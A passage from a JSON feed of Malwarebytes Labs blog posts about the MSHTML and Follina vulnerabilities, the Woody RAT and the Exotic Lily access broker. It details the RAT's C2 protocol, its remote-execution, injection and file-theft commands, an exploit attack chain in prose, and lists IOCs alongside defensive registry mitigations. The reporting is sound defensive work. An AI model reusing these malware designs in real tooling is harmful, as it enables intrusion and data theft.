Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn't long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. 
Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\nStay safe, everyone!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-08T14:51:13", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat's distribution methods and capabilities, as well as its communication protocol.\n\n## Distribution methods\n\nBased on our knowledge, Woody Rat has been distributed using two different formats: 
archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat were typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure1.png>) Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has been weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The lure, written in Russian, is called \"_Information security memo_\" and provides security practices for passwords, confidential information, etc.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure2.png>) Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information, including a pdb path, from which we derived the name for this new Rat:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure3.png>) Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. 
Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as the parameter.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure4.png>) main function\n\nAs we will see later, the malware uses multiple threads, so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request.\n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine-specific values. The values are taken from the adapter information, computer name and volume information, and the malware appends 8 random bytes to this value to avoid any possible cookie collisions.\n\nA combination of the _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions is used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure5.png>) get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary; the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. 
Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure6.png>) RSA Encryption routine\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure7.png>) AES Encryption Routine\n\n### C2 HTTP endpoint request\n\n**knock** \\- This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.\n\nThe data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure8.png>) knock request headers\n\n**submit **\\- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. 
[Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** \\- The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with \"_CRY\" then the malware proceeds to send the knock request again but if the C2 responds with \"_ACK\" the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. 
We should note that all the communications involved in these commands are AES encrypted.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure9.png>) Command execution routine\n\n**_SET Commands**\n\n * **PING** \\- This command is used to set the sleep interval between every ping request to the C2.\n * **PURG** \\- Unknown command\n * **EXIT** \\- Exit the command execution thread.\n\n**_REQ Commands**\n\n * **EXEC** (Execute) - Executes the command received from the C2 by creating a cmd.exe process; the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then \"_DAT\" is appended to this data before it is AES encrypted and sent to the C2.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure10.png>) EXEC command\n\n * **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as a file.\n * **INFO** (Submit Information) - The INFO command is similar to the \"submit\" request above; this command sends the same information to the C2 as the \"submit\" request.\n\n INFO command\n\n * **UPEX** (Upload and Execute) - This is a combination of the UPLD and EXEC commands. The command first writes a file received from the C2 and then executes that file.\n * **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.\n * **PROC** (Execute Process) - The PROC command is similar to the EXEC command with one difference: the process is executed directly rather than through cmd.exe as in the EXEC command. The command uses named pipes in the same fashion as the EXEC command.\n * **UPPR** (Upload and Execute Process) - This is a combination of the UPLD and PROC commands. 
The command receives the remote file using the upload command then executes the file using PROC command.\n * **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.\n * **_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are: \n * Filename\n * Type (Directory, Unknown, File)\n * Owner\n * Creation time\n * Last access time\n * Last write time\n * Size\n * Permissions\n * **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple children commands which are executed in the same order they are received by the malware.\n * **SCRN** (Screenshot) - This command leverages Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.\n * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure12.png>) INJC routine\n\n * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2: \n * PID\n * ParentPID\n * Image Name\n * Owner\n * **DMON** (Creates Process) - The command seems similar to PROC with the only difference being the output of the process execution is not sent back to the C2. 
It receives the process name from the C2 and executes it using CreateProcess.\n * **UPDM** (Upload and Create Process) - Allows the C2 to upload a file and then execute it using the DMON command.\n\n**SharpExecutor and PowerSession Commands**\n\nInterestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware the ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.\n\n_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET DLLs are loaded by the malware and commands are executed via the methods present in these DLLs:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure13.png>) SharpExecutor and PowerSession methods\n\nWe will look at the commands utilising these DLLs below:\n\n * **DN_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute a .NET assembly with arguments received from the C2. The code is received as an array of Base64 strings separated by the 0x20 (space) character.\n * **DN_D** (DotNet DLL) - This method gives the attacker much more control over the execution. An attacker can choose whether or not to send the console output back to the C2. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. 
The DLL loads the code and finds and executes the method based on other arguments received from the C2.\n * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.\n * **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.\n * **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.\n\n### Malware Cleanup\n\nAfter creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure14.png>) Malware deletes itself\n\n## Unknown threat actor\n\nThis very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.\n\nMalwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. 
We also already detected the binary payloads via our heuristic malware engines.\n\n## IOCs\n\n**Woody Rat**:\n\n**C2s:**\n\n * kurmakata.duckdns[.]org\n * microsoft-ru-data[.]ru\n * 194.36.189.179\n * microsoft-telemetry[.]ru\n * oakrussia[.]ru\n\n**Follina Doc:** \n\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx \nffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb \n**Follina html file:** \ngarmandesar.duckdns[.]org:444/uoqiuwef.html \n**Woody Rat url:** \nfcloud.nciinform[.]ru/main.css", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-03T21:00:00", "type": "malwarebytes", "title": "Woody RAT: A new feature-rich malware spotted in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-03T21:00:00", "id": "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "href": "https://www.malwarebytes.com/blog/news/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-13T12:35:29", "description": "Several researchers have independently reported a 0-day remote code execution vulnerability in MSHTML to Microsoft. The reason it was reported by several researchers probably lies in the fact that a limited number of attacks using this vulnerability have been identified, as per Microsoft\u2019s [security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). \n\n> Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nMSHTML is a software component used to render web pages on Windows. Although it's most commonly associated with Internet Explorer, it is also used in other software including versions of Skype, Microsoft Outlook, Visual Studio, and others.\n\nMalwarebytes, as shown lower in this article, blocks the related malicious powershell code execution.\n\n### CVE-2021-40444\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one has been assigned the designation [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>) and received a CVSS score of 8.8 out of 10. 
The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\nThe Cybersecurity and Infrastructure Security Agency took to Twitter to [encourage](<https://twitter.com/USCERT_gov/status/1435342618704191491>) users and organizations to review Microsoft's mitigations and workarounds to address CVE-2021-40444.\n\n### ActiveX\n\nBecause MSHTML is the beating heart of Internet Explorer, the vulnerability also exists in that browser. Although given its limited use, there is little risk of infection by that vector. Microsoft Office applications however, use the MSHTML component to display web content in Office documents.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nSo, the attacker will have to trick the user into opening a malicious document. But we all know how good some attackers are at this.\n\n### Mitigation\n\nAt the moment all supported Windows versions are vulnerable. Since there is no patch available yet, Microsoft proposes a few methods to block these attacks.\n\n * Disable the installation of all ActiveX controls in Internet Explorer via the registry. Previously-installed ActiveX controls will still run, but no new ones will be added, including malicious ones.\n * Open documents from the Internet in Protected View or Application Guard for Office, both of which prevent the current attack. This is a default setting but it may have been changed.\n\nDespite the lack of a ready patch, all versions of Malwarebytes currently block this threat, as shown below. 
Malwarebytes also detects the eventual payload, Cobalt Strike, and has done so for years, meaning that even if a threat actor had disabled anti-exploit, then Cobalt Strike itself would still be detected. \n\n\n\nA screenshot from Malwarebytes Teams showing active detection of this threat\n\nA screenshot from Malwarebytes Nebula showing active detection of this threat\n\nA screenshot of Malwarebytes Teams blocking the final payload\n\nA screenshot of Malwarebytes Anti-Exploit blocking the exploit payload process\n\n### Registry changes\n\nModifying the registry may create unforeseen results, so create a backup before you change it! It may also come in handy when you want to undo the changes at a later point.\n\nTo create a backup, open Regedit and drill down to the key you want to back up (if it exists):\n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones`\n\nRight click the key in the left side of the registry pane and select "Export". Follow the prompts and save the created reg file with a name and in a location where you can easily find it.\n\n\n\nTo make the recommended changes, open a text file and paste in the following script. 
Make sure that all of the code box content is pasted into the text file!\n \n \n Windows Registry Editor Version 5.00\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n\nSave the file with a .reg file extension. Right-click the file and select Merge. You'll be prompted about adding the information to the registry; agree, and then reboot your machine.\n\n## Update September 9, 2021\n\nIt has taken researchers only a few days to circumvent the mitigations proposed by Microsoft. Once they were able to find a sample of a malicious Word document, they started analyzing how it works and along the way poked holes in the defense strategies proposed by Microsoft.\n\nOne of the wobbly pillars is the Mark-of-the-Web (MoTW) flag that is given to downloaded files. This only blocks the exploit until a user clicks the 'Enable Editing' button. Sadly, experience has taught us that it is not a good idea to trust that they won't do that. Another problem with this flag is that it doesn't survive handling by other applications, for example unzipping. Another problem is that certain file types use the same MSHTML component to view web content but are not protected by Office's Protected View security feature. 
Researcher [Will Dormann](<https://twitter.com/wdormann/status/1435951560006189060>) was able to replicate the attack using an RTF file.\n\nThe registry fix we posted to prevent ActiveX controls from running in Internet Explorer was supposed to effectively block the current attacks. But security researcher Kevin Beaumont has already [discovered a way](<https://twitter.com/GossiTheDog/status/1435570418623070210>) to bypass Microsoft's current mitigations to exploit this vulnerability.\n\n### The attack chain\n\nThe researchers have also managed to reconstruct the attack chain with the use of a limited set of samples of malicious docx files. \n\n * Once a user clicks on the 'Enable Editing' button, the exploit will load a _side.html_ file by using the mhtml protocol to open a URL. The _side.html_ file is hosted at a remote site and will be loaded as a Word template.\n * The Internet Explorer browser will be started to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability to create a malicious ActiveX control.\n * This ActiveX control will download a _ministry.cab_ file from a remote site.\n * It then extracts a _championship.inf_ file, which is actually a DLL, and executes it as a CPL file by using rundll32.exe.\n * The ultimate payload is a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device.\n\nGiven the few days that are left until the next Patch Tuesday, it is doubtful whether Microsoft will be able to come up with an effective patch.\n\nConsider me one happy camper that Malwarebytes does not rely on the MoTW flag.\n\n_This is what happened when I tried to "edit" the Word doc the researchers analyzed_\n\n## Update September 13, 2021\n\nAs [reported by BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) threat actors are sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe 
hacker can follow step-by-step instructions to build their own attacks. The method we mentioned that uses an RTF file even works in Windows Explorer file previews, which means this vulnerability can be exploited by viewing a malicious document using the Windows Explorer preview feature.\n\nSince this was discovered, Microsoft has added the following mitigation to disable previewing of RTF and Word documents:\n\n 1. In the Registry Editor (regedit.exe), navigate to the appropriate registry key: **For Word documents, navigate to these keys:**\n * HKEY_CLASSES_ROOT\\.docx\\ShellEx\\{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT\\.doc\\ShellEx\\{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT\\.docm\\ShellEx\\{8895b1c6-b41f-4c1c-a562-0d564250836f} **For rich text files (RTF), navigate to this key:**\n * HKEY_CLASSES_ROOT\\.rtf\\ShellEx\\{8895b1c6-b41f-4c1c-a562-0d564250836f}\n 2. Export a copy of the Registry key as a backup.\n 3. Now double-click **Name** and in the **Edit String** dialog box, delete the Value Data.\n 4. 
Click **OK**.\n\nWord document and RTF file previews are now disabled in Windows Explorer.\n\nTo enable Windows Explorer preview for these documents, double-click on the backup .reg file you created in step 2 above.\n\nStay safe, everyone!\n\nThe post [[updated] Windows MSHTML zero-day actively exploited, mitigations required](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-08T11:04:07", "type": "malwarebytes", "title": "[updated] Windows MSHTML zero-day actively exploited, mitigations required", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T11:04:07", "id": "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-18T23:27:45", "description": "The Google Threat Analysis Group (TAG) has shared their observations about a group of cybercriminals called Exotic Lily. This group has specialized itself as an initial access broker, which means they find a vulnerability in an organization's defenses, exploit that vulnerability, and sell the access to the victim's network to an interested party, several times over with different victims.\n\nAmong these interested parties TAG found the [Conti](<https://blog.malwarebytes.com/threat-spotlight/2021/05/threat-spotlight-conti-the-ransomware-used-in-the-hse-healthcare-attack/>) and Diavol ransomware groups. 
Because Exotic Lily's methods involved a lot of detail, they are believed to require a level of human interaction that is rather unusual for cybercrime groups focused on large scale operations.\n\n## Initial access broker\n\nLike in any maturing industry, you can expect to see specialization and diversification. Initial access brokers are an example of specialized cybercriminals. They will use a vulnerability to gain initial access, and, probably based on the nature of the target, sell this access to other cybercriminals that can use this access to deploy their specific malware.\n\nThese initial access brokers are different from the usual ransomware affiliates that will deploy the ransomware they are affiliated with themselves and use the infrastructure provided by the ransomware as a service (RaaS) group to get a chunk of the ransom if the victim decides to pay. The RaaS will provide the encryption software, the contact and leak sites, and negotiate the ransom with the victim. An initial access broker will inform another cybercriminal by letting them know they have found a way in at company xyz, and inquire how much they are willing to pay for that access.\n\n## Exotic Lily\n\nFrom the [TAG blog](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) we can learn that Exotic Lily was very much specialized. Their initial attack vector was email. Initially, they were targeting specific industries such as IT, cybersecurity, and healthcare, but that focus has become less stringent.\n\nTheir email campaigns gained credibility by spoofing companies and employees. Their email campaigns were targeted to a degree that they are believed to be sent by real human operators using little to no automation. 
To evade detection mechanisms, they used common services like WeTransfer, TransferNow, and OneDrive to deliver the payload.\n\nLast year, researchers found that Exotic Lily used the vulnerability listed as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), a Microsoft MSHTML Remote Code Execution (RCE) vulnerability. Microsoft also posted a [blog](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) about attacks that exploited this vulnerability. Later, the group shifted to using customized versions of [BazarLoader](<https://blog.malwarebytes.com/detections/trojan-bazar/>) delivered inside ISO files.\n\nBased on the fact that Exotic Lily\u2019s operations require a lot of human interaction, the researchers did an analysis of the \u201cworking hours\u201d and came to the conclusion that it looks like a regular 9 to 5 operation located in a Central or Eastern Europe time zone.\n\n## Social engineering\n\nAs with most email campaigns, the amount of social engineering largely defines how successful such a campaign can be. Between the millions of emails sent in a "spray-and-pray" attack and the thousands that Exotic Lily sends out per day, there is a huge difference in success rate.\n\nExotic Lily used identity [spoofing](<https://blog.malwarebytes.com/cybercrime/2016/06/email-spoofing/>) where they took a legitimate company's domain and replaced its TLD with \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d. At first, the group would create entirely fake personas posing as employees of a real company. These personas came complete with social media profiles, personal websites, and AI generated profile pictures. 
That must have been a lot of work, so at some point the group started to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\nUsing such spoofed accounts, the attackers would send [spear phishing](<https://blog.malwarebytes.com/social-engineering/2020/01/spear-phishing-101-what-you-need-to-know/>) emails with a business proposal and even engage in further communication with the target by attempting to schedule a meeting to discuss the project's design or requirements.\n\n## IOCs\n\nSHA-256 hashes of the **BazarLoader** ISO samples:\n\n * 5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n * 9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\n * c896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7\n\nSHA-256 hashes of the **BUMBLEBEE** ISO samples:\n\n**IP** address of the [C&C server](<https://blog.malwarebytes.com/glossary/cc/>):\n\n * 23.81.246.187\n\nStay safe, everyone!\n\nThe post [Meet Exotic Lily, access broker for ransomware and other malware peddlers](<https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T22:58:48", "type": "malwarebytes", "title": "Meet Exotic Lily, access broker for ransomware and other malware peddlers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-03-18T22:58:48", "id": "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "href": "https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-02T17:32:49", "description": "On Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) for a zero-day remote code vulnerability, 'Follina', already being exploited in the wild via malicious Word documents.\n\n_**Q: What exactly is Follina?**_\n\nA: Follina is the nickname given to a new vulnerability discovered as a zero-day and identified as CVE-2022-30190. In technical terms it is a Remote Code Execution Vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).\n\n_**Q: But what does it mean, and is this a serious vulnerability?**_\n\nA: An attacker can send you a malicious Office document that will compromise your machine with malware when you open it. 
It is serious since it is already actively being exploited in the wild and doesn't require users to enable macros.\n\n**_Q: What is Microsoft doing about it?_**\n\nA: Microsoft has offered [mitigation steps](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) that disable the MSDT URL Protocol. However, users should proceed with caution because of possible conflicts and crashes with existing applications.\n\n_**Q: Does Malwarebytes protect against Follina?**_\n\nA: Yes, it does. Please see additional steps below based on your product to ensure you are protected.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Follina_block.png> \"\" )\n\n## How to add protection with Malwarebytes\n\nWe are working on releasing a new version of Anti-Exploit that won't require adding new shields and will provide more holistic protection. For immediate mitigation, please follow the instructions below.\n\n### Malwarebytes Premium (Consumer)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/MB4.gif> \"\" )\n\n### Malwarebytes Nebula (Enterprise)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Nebula.gif> \"\" )\n\nThe post [FAQ: Mitigating Microsoft Office's 'Follina' 